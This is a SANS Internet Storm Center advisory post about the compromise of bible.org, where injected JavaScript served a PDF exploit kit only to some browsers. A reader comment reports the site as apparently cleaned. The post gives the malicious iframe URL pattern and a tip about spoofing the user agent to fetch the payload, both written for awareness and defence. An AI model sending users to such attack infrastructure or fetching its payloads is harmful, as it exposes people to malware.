Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC: When web sites go bad: bible . org compromise - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
When web sites go bad: bible . org compromise

NOTE: The site is STILL compromissed right now. DO NOT VISIT.

This is more of an "awareness" item to show to coworkers and relatives that you can't be careful enough. "bible . org" is a site that offers as the name implies access to the bible and related commentary as well as translations. Sadly, earlier this week the site go appearantly compromissed. The owner was notified, but didn't have the means or skills to clean the site so far. 

Like in so many cases, the exploit inserts javascript at the very top of the page. Likely this may have happened via a compromised configuration file. But right now, we don't know. The malicious content is only shown to some browsers based on the user agent string. So a plain wget or curl won't get you the malware. You need to specify the user agent string (for wget, setup a .wgetrc file to do this automatically, or use the -U switch).

The exploit inserts an iframe with changing URL following the pattern http://[random string].ddns.name/b6noxa1/counter.php?fid=2 (the domains I saw have been reported to changeip.com ). 

The wepawet analysis [1] shows that at least one Adobe PDF vulnerability is being exploited, luckily an older one (CVE-2010-0188), but there is an additional PDF that webawet didn't analyse. It can be tricky to retrieve all components of these exploit kits from a non-vulnerable or simulated browser.

[1] http://wepawet.iseclab.org/view.php?hash=ae81a29e04bd93994c1f92411e58975a&t=1361545134&type=js

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

I will be teaching next: Intrusion Detection In-Depth - SIEM Summit & Training 2019

Johannes

3628 Posts
ISC Handler
Looks like it must be fixed now.
bible.org all negative results:
https://www.virustotal.com/en/url/67c895cb6861a5f1c340ed72a5a87ab253f0eb5758a154cb998bfd80a7bece65/analysis/1361666228/
http://urlquery.net/report.php?id=1090906
http://wepawet.iseclab.org/view.php?hash=043f7460996ea401c862f0ae68475623&t=1361666897&type=js

HTML source on Pastebin as of 7pm CST 2/23 on IE10 Win7: http://pastebin.com/qEGSpuhU

I see nothing referencing counter, ddns, and only normal JS mentions of .name (not associated with a TLD)
Anonymous

Sign Up for Free or Log In to start participating in the conversation!